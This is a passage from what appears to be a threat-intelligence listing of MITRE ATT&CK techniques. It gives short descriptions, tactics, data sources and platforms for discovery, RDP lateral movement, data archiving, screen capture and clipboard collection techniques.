Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre